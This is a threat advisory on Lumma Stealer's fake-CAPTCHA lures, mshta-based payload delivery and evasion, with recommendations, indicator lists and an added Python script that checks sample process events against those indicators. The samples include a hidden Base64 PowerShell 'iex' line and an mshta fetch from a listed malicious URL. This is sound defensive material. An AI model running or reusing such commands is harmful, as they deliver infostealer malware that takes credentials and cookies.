Lumma Stealer Campaign: Fake Captcha Lures And Evasion Techniques Uncovered

Lumma Stealer is a commodity infostealer that is actively evolving. Threat actors are deploying fake CAPTCHAs and other novel methods to bypass traditional security layers. The malware is distributed via phishing campaigns and malvertising, and its primary goal is to exfiltrate credentials, cookies, and sensitive system information.

Severity Level: High

THREAT OVERVIEW:

  1. Malware Involved:
    o Lumma Stealer (also known as LummaC2), typically delivered via loaders or exploit kits.
    o Lumma is sold under the malware-as-a-service (MaaS) model and has existed since at least 2022.
  2. Attack Details:
    Initial Vector:
    o Victims are lured through malvertising and rogue websites.
    o Redirection to fake CAPTCHA pages that simulate user interaction.
    Social Engineering Tactic:
    o CAPTCHA instructs users to open the Windows Run dialog (Win+R) and paste clipboard content, unknowingly executing malicious commands.
    o A JavaScript snippet silently adds the payload download command to the clipboard.
    Payload Delivery:
    o Command uses mshta.exe (a known LOLBIN) to fetch and run a remote HTA file, initiating malware installation.
    o Payloads observed include components that bypass Windows AMSI protections.
    Malware Execution:
    o Payload downloads and executes Lumma Stealer, which exfiltrates credentials, cookies, and crypto data.
    o Some variants include open-source AMSI bypass code to prevent detection by antivirus/EDR solutions.

Recommendations:

  1. Regularly update software to mitigate known CVEs that could aid initial access.
  2. Restrict execution of unapproved or unsigned executables and DLLs to prevent unauthorized code from running.
  3. Block access to high-risk categories like cracked software and file-sharing platforms.
  4. Train users to identify fake CAPTCHAs and suspicious software sources.
  5. Monitor for the following indicators of attack:
    • PowerShell commands with parameters like Invoke-Expression, Invoke-WebRequest, iex, FromBase64String
    • Execution of AutoIt3.exe or AutoIt*.exe from %TEMP%
    • PE files executing .a3x scripts or downloading remote content
    • Referrer headers or URLs containing: camplytic.com/go/ OR exo.io/store-as/ OR aliyuncs.com/new-artist.txt
    • .lnk file launching powershell.exe, mshta.exe, or sftp.exe
    • PowerShell launched via Run dialog. Detection Trigger: explorer.exe -> powershell.exe
    • Filenames: Instruction_695-18014-012_Rev.PDF.lnk, ArtistSponsorship.exe
  6. Block the IOCs at their respective controls: https://www.virustotal.com/gui/collection/282c17a838f62b2ca1e0fdc9fdd0c02a2f4e286eac8843e84ed6353cbb66c366/iocs
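The following is an added detection example, not code from the advisory or from any of the sources it cites. It applies the indicators of attack listed in recommendation 5 to process-creation events in a Sysmon Event ID 1 style (image, parent image, command line). The events are constructed sample data, the helper and function names are this example's own, and the URL and filename indicators are the ones quoted in the advisory.

```python
# Added example: match the advisory's indicators of attack against
# process-creation events. Field names mirror Sysmon Event ID 1; the
# events below are constructed samples, not real telemetry.
import re

# Indicators quoted from the advisory (compared case-insensitively)
INDICATOR_URLS = ("camplytic.com/go/", "exo.io/store-as/", "aliyuncs.com/new-artist.txt")
INDICATOR_FILENAMES = ("instruction_695-18014-012_rev.pdf.lnk", "artistsponsorship.exe")
PS_SUSPICIOUS_TOKENS = ("invoke-expression", "invoke-webrequest", "iex", "frombase64string")
# Children of explorer.exe that indicate a Run-dialog (Win+R) launch
RUN_DIALOG_CHILDREN = ("powershell.exe", "mshta.exe")

# Constructed sample events: one benign, three matching the chain, one benign admin use
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"notepad.exe C:\Users\u\notes.txt"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -w hidden -c \"iex ([Text.Encoding]::UTF8.GetString("
                "[Convert]::FromBase64String('QQ==')))\""},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe https://camplytic.com/go/lure"},
    {"image": r"C:\Users\u\AppData\Local\Temp\AutoIt3.exe",
     "parent": r"C:\Users\u\AppData\Local\Temp\setup.exe",
     "cmdline": r"AutoIt3.exe C:\Users\u\AppData\Local\Temp\script.a3x"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(event: dict) -> list[str]:
    """Return a list of human-readable findings for one process-creation event."""
    image = basename(event["image"])
    parent = basename(event["parent"])
    cmd_l = event["cmdline"].lower()
    findings = []

    # Run-dialog launch: explorer.exe -> powershell.exe / mshta.exe
    if parent == "explorer.exe" and image in RUN_DIALOG_CHILDREN:
        findings.append(f"run-dialog launch: explorer.exe -> {image}")

    # PowerShell invoked with download / eval / decoding parameters
    if image in ("powershell.exe", "pwsh.exe"):
        hits = sorted(t for t in PS_SUSPICIOUS_TOKENS
                      if re.search(rf"\b{re.escape(t)}\b", cmd_l))
        if hits:
            findings.append("suspicious PowerShell parameters: " + ", ".join(hits))

    # mshta.exe fetching a remote HTA
    if image == "mshta.exe" and re.search(r"https?://", cmd_l):
        findings.append("mshta.exe fetching remote content")

    # AutoIt interpreter (AutoIt3.exe / AutoIt*.exe) running out of %TEMP%
    if image.startswith("autoit") and image.endswith(".exe") \
            and "\\temp\\" in event["image"].lower():
        findings.append("AutoIt interpreter running from %TEMP%")

    # Any process handed a compiled AutoIt script
    if ".a3x" in cmd_l:
        findings.append("execution of a .a3x script")

    # Known URL fragments and filenames from the advisory
    for url in INDICATOR_URLS:
        if url in cmd_l:
            findings.append(f"known indicator URL: {url}")
    for name in INDICATOR_FILENAMES:
        if name == image or name in cmd_l:
            findings.append(f"known indicator filename: {name}")

    return findings


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> findings, keeping only events that produced findings."""
    results = {}
    for idx, event in enumerate(events):
        findings = check_event(event)
        if findings:
            results[idx] = findings
    return results


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {'; '.join(findings)}")
```

The explorer.exe -> powershell.exe trigger also fires on legitimate use of the Run dialog, so baseline it per environment and weight it higher when it coincides with a second finding (encoded or downloading PowerShell, a remote HTA, an AutoIt interpreter in %TEMP%) on the same host within a short window. Command-line string matching is a starting point; pair it with the blocking controls in recommendations 2 and 3 rather than relying on it alone.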

Source:

  • https://news.sophos.com/en-us/2025/05/09/lumma-stealer-coming-and-going/
  • https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
  • https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha

Ampcus Cyber